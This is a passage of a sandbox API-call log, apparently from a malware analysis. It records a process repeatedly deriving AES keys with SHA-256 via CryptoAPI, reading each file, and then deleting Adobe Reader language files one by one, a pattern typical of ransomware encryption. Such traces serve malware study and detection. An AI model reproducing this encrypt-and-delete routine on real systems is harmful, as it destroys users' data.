dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.439] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.439] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.439] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.439] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.439] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.459] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.459] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.459] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.474] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt")) returned 1 [0222.476] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.476] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.477] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.477] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.477] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ed0 [0222.477] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.488] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.488] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.488] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.490] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt")) returned 1 [0222.492] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.492] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.492] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.492] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.492] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.492] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.505] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.505] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.505] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.506] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt")) returned 1 [0222.507] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.508] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.508] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.508] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.508] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.508] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.512] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.512] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.512] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.513] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt")) returned 1 [0222.515] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.515] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.515] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.515] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.515] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec6 [0222.515] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.554] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.554] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.554] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.556] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt")) returned 1 [0222.596] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.597] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.597] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.597] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.597] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec0 [0222.597] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.616] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.616] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.616] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.617] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt")) returned 1 [0222.618] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.619] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.619] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.619] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.619] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.619] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.623] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.623] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.623] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.624] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt")) returned 1 [0222.627] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.628] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.628] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.628] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.628] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.628] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.632] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.632] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.632] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.633] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt")) returned 1 [0222.648] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.649] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.649] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.649] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.649] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.649] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.653] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.653] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.653] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.654] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt")) returned 1 [0222.656] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.656] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.656] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.656] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.656] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec0 [0222.656] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.666] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.666] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.666] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.668] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt")) returned 1 [0222.669] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.670] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.670] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.670] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.670] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ecc [0222.670] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.675] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.675] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.675] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.676] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt")) returned 1 [0222.679] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.679] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.679] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.679] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.679] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.679] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.684] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.684] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.684] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.686] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt")) returned 1 [0222.687] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.687] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.687] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.688] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.688] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.688] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.691] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.691] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.691] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.692] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt")) returned 1 [0222.694] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.694] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.694] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.694] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.694] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.694] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.698] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.698] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.698] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.699] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt")) returned 1 [0222.701] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.701] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.701] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.701] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.702] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.702] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.738] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.738] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.738] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.740] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt")) returned 1 [0222.741] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.742] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.742] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.742] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.742] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.742] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.745] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.745] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.745] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.746] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt")) returned 1 [0222.748] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.748] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.748] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.748] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.748] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.748] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.752] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.752] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.752] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.753] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt")) returned 1 [0222.755] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.755] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.755] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.755] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.755] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.755] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.759] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.759] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.759] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.760] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt")) returned 1 [0222.769] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.770] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, 